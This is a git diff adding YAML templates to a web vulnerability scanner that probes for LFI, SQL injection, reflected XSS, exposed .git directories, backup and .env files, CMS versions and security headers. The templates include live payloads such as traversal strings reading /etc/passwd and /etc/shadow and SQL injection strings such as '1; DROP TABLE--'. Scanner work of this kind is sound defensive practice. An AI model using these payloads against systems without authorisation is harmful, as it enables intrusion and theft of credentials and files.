diff --git a/modules/http/lfi-basic.yaml b/modules/http/lfi-basic.yaml
new file mode 100644
index 0000000..f12bac6
--- /dev/null
+++ b/modules/http/lfi-basic.yaml
@@ -0,0 +1,49 @@
+# Basic LFI Detection Module
+
+id: lfi-basic
+info:
+  name: Basic LFI Detection
+  author: sif
+  severity: high
+  description: Detects basic Local File Inclusion vulnerabilities
+  tags: [lfi, injection, file-inclusion, owasp-top10]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}/?file={{payload}}"
+    - "{{BaseURL}}/?page={{payload}}"
+    - "{{BaseURL}}/?path={{payload}}"
+    - "{{BaseURL}}/?include={{payload}}"
+    - "{{BaseURL}}/?doc={{payload}}"
+    - "{{BaseURL}}/?template={{payload}}"
+
+  payloads:
+    - "../../../../../../../etc/passwd"
+    - "....//....//....//....//....//etc/passwd"
+    - "..%2f..%2f..%2f..%2f..%2fetc/passwd"
+    - "/etc/passwd"
+    - "../../../../../../../etc/shadow"
+    - "../../../../../../../windows/system32/drivers/etc/hosts"
+
+  threads: 10
+
+  matchers:
+    - type: regex
+      part: body
+      regex:
+        - "root:.*:0:0:"
+        - "daemon:.*:1:1:"
+        - "nobody:.*:65534:"
+        - "127\\.0\\.0\\.1\\s+localhost"
+      condition: or
+
+  extractors:
+    - type: regex
+      name: detected_file
+      part: body
+      regex:
+        - "(root|daemon|nobody):.*:[0-9]+:[0-9]+:"
+      group: 0
diff --git a/modules/http/sqli-error.yaml b/modules/http/sqli-error.yaml
new file mode 100644
index 0000000..2b69cf8
--- /dev/null
+++ b/modules/http/sqli-error.yaml
@@ -0,0 +1,66 @@
+# SQL Injection Error-Based Detection Module
+
+id: sqli-error-based
+info:
+  name: SQL Injection (Error-Based)
+  author: sif
+  severity: high
+  description: Detects SQL injection via database error messages
+  tags: [sqli, injection, database, owasp-top10]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}/?id={{payload}}"
+    - "{{BaseURL}}/?user={{payload}}"
+    - "{{BaseURL}}/?search={{payload}}"
+    - "{{BaseURL}}/?q={{payload}}"
+    - "{{BaseURL}}/?query={{payload}}"
+    - "{{BaseURL}}/?cat={{payload}}"
+
+  payloads:
+    - "'"
+    - "''"
+    - "1'"
+    - "1' OR '1'='1"
+    - "1' OR '1'='1'--"
+    - "1' OR '1'='1'/*"
+    - "1; DROP TABLE--"
+    - "' UNION SELECT NULL--"
+    - "1 AND 1=1"
+    - "1 AND 1=2"
+
+  threads: 10
+
+  matchers:
+    - type: regex
+      part: body
+      regex:
+        - "SQL syntax.*MySQL"
+        - "Warning.*mysql_"
+        - "MySqlException"
+        - "valid MySQL result"
+        - "ORA-[0-9]+"
+        - "Oracle.*Driver"
+        - "Oracle.*Error"
+        - "PostgreSQL.*ERROR"
+        - "pg_query.*failed"
+        - "Microsoft SQL Server"
+        - "ODBC SQL Server Driver"
+        - "SQLite3::"
+        - "sqlite_query"
+        - "SQLite/JDBCDriver"
+        - "SQL Server.*Driver"
+        - "Unclosed quotation mark"
+        - "quoted string not properly terminated"
+      condition: or
+
+  extractors:
+    - type: regex
+      name: db_type
+      part: body
+      regex:
+        - "(MySQL|PostgreSQL|Oracle|MSSQL|SQLite|MariaDB)"
+      group: 1
diff --git a/modules/http/xss-reflected.yaml b/modules/http/xss-reflected.yaml
new file mode 100644
index 0000000..4d48774
--- /dev/null
+++ b/modules/http/xss-reflected.yaml
@@ -0,0 +1,41 @@
+# Reflected XSS Detection Module
+
+id: xss-reflected
+info:
+  name: Reflected XSS Detection
+  author: sif
+  severity: medium
+  description: Detects reflected Cross-Site Scripting vulnerabilities
+  tags: [xss, injection, javascript, owasp-top10]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}/?q={{payload}}"
+    - "{{BaseURL}}/?search={{payload}}"
+    - "{{BaseURL}}/?name={{payload}}"
+    - "{{BaseURL}}/?input={{payload}}"
+    - "{{BaseURL}}/?message={{payload}}"
+    - "{{BaseURL}}/?text={{payload}}"
+
+  payloads:
+    - "<script>alert('XSS')</script>"
+    - "'><script>alert('XSS')</script>"
+    - "\"><script>alert('XSS')</script>"
+    - "<img src=x onerror=alert('XSS')>"
+    - "<svg onload=alert('XSS')>"
+    - "javascript:alert('XSS')"
+    - "<body onload=alert('XSS')>"
+
+  threads: 10
+
+  matchers:
+    - type: word
+      part: body
+      words:
+        - "<script>alert('XSS')</script>"
+        - "<img src=x onerror=alert('XSS')>"
+        - "<svg onload=alert('XSS')>"
+      condition: or
diff --git a/modules/info/cms-drupal.yaml b/modules/info/cms-drupal.yaml
new file mode 100644
index 0000000..0fa6bec
--- /dev/null
+++ b/modules/info/cms-drupal.yaml
@@ -0,0 +1,35 @@
+# Drupal CMS Detection Module
+
+id: cms-drupal
+info:
+  name: Drupal Detection
+  author: sif
+  severity: info
+  description: Detects Drupal CMS installations
+  tags: [cms, drupal, detection, info]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}"
+
+  matchers:
+    - type: word
+      part: all
+      words:
+        - "Drupal.settings"
+        - "X-Drupal-Cache"
+        - "/sites/default/files"
+        - "drupal.js"
+      condition: or
+
+  extractors:
+    - type: regex
+      name: drupal_version
+      part: body
+      regex:
+        - 'Drupal ([0-9.]+)'
+        - 'content="Drupal ([0-9.]+)"'
+      group: 1
diff --git a/modules/info/cms-wordpress.yaml b/modules/info/cms-wordpress.yaml
new file mode 100644
index 0000000..2eb4af3
--- /dev/null
+++ b/modules/info/cms-wordpress.yaml
@@ -0,0 +1,37 @@
+# WordPress CMS Detection Module
+
+id: cms-wordpress
+info:
+  name: WordPress Detection
+  author: sif
+  severity: info
+  description: Detects WordPress CMS installations
+  tags: [cms, wordpress, detection, info]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}"
+    - "{{BaseURL}}/wp-login.php"
+    - "{{BaseURL}}/wp-admin/"
+
+  matchers:
+    - type: word
+      part: body
+      words:
+        - "wp-content"
+        - "wp-includes"
+        - "wp-json"
+        - "wordpress"
+      condition: or
+
+  extractors:
+    - type: regex
+      name: wp_version
+      part: body
+      regex:
+        - 'content="WordPress ([0-9.]+)"'
+        - 'wp-includes/js/wp-embed.min.js\?ver=([0-9.]+)'
+      group: 1
diff --git a/modules/info/security-headers.yaml b/modules/info/security-headers.yaml
new file mode 100644
index 0000000..b3046b8
--- /dev/null
+++ b/modules/info/security-headers.yaml
@@ -0,0 +1,50 @@
+# Security Headers Check Module
+# Checks for missing or misconfigured security headers
+
+id: security-headers
+info:
+  name: Security Headers Analysis
+  author: sif
+  severity: info
+  description: Checks for presence and configuration of security headers
+  tags: [headers, security, info, owasp]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}"
+
+  matchers:
+    - type: regex
+      part: header
+      regex:
+        - "X-Frame-Options"
+        - "X-Content-Type-Options"
+        - "Strict-Transport-Security"
+        - "Content-Security-Policy"
+        - "X-XSS-Protection"
+      condition: or
+
+  extractors:
+    - type: regex
+      name: x_frame_options
+      part: header
+      regex:
+        - "X-Frame-Options: (.+)"
+      group: 1
+
+    - type: regex
+      name: content_security_policy
+      part: header
+      regex:
+        - "Content-Security-Policy: (.+)"
+      group: 1
+
+    - type: regex
+      name: strict_transport_security
+      part: header
+      regex:
+        - "Strict-Transport-Security: (.+)"
+      group: 1
diff --git a/modules/recon/backup-files.yaml b/modules/recon/backup-files.yaml
new file mode 100644
index 0000000..249766d
--- /dev/null
+++ b/modules/recon/backup-files.yaml
@@ -0,0 +1,45 @@
+# Backup Files Detection Module
+
+id: backup-files
+info:
+  name: Backup Files Detection
+  author: sif
+  severity: medium
+  description: Detects common backup files that may expose sensitive information
+  tags: [backup, exposure, misconfiguration, recon]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}/backup.sql"
+    - "{{BaseURL}}/backup.zip"
+    - "{{BaseURL}}/backup.tar.gz"
+    - "{{BaseURL}}/database.sql"
+    - "{{BaseURL}}/db.sql"
+    - "{{BaseURL}}/dump.sql"
+    - "{{BaseURL}}/.env"
+    - "{{BaseURL}}/.env.backup"
+    - "{{BaseURL}}/config.php.bak"
+    - "{{BaseURL}}/web.config.bak"
+    - "{{BaseURL}}/wp-config.php.bak"
+    - "{{BaseURL}}/settings.py.bak"
+
+  threads: 5
+
+  matchers:
+    - type: status
+      status:
+        - 200
+
+    - type: regex
+      part: body
+      regex:
+        - "CREATE TABLE"
+        - "INSERT INTO"
+        - "DB_PASSWORD"
+        - "APP_KEY"
+        - "SECRET_KEY"
+        - "database_password"
+      condition: or
diff --git a/modules/recon/git-exposed.yaml b/modules/recon/git-exposed.yaml
new file mode 100644
index 0000000..b00dfbc
--- /dev/null
+++ b/modules/recon/git-exposed.yaml
@@ -0,0 +1,39 @@
+# Exposed Git Repository Detection Module
+
+id: git-exposed
+info:
+  name: Exposed Git Repository
+  author: sif
+  severity: high
+  description: Detects exposed .git directories that may leak source code
+  tags: [git, exposure, source-code, misconfiguration]
+
+type: http
+
+http:
+  method: GET
+  paths:
+    - "{{BaseURL}}/.git/HEAD"
+    - "{{BaseURL}}/.git/config"
+    - "{{BaseURL}}/.git/index"
+
+  matchers:
+    - type: word
+      part: body
+      words:
+        - "ref: refs/"
+        - "[core]"
+        - "repositoryformatversion"
+      condition: or
+
+    - type: status
+      status:
+        - 200
+
+  extractors:
+    - type: regex
+      name: git_branch
+      part: body
+      regex:
+        - "ref: refs/heads/(.+)"
+      group: 1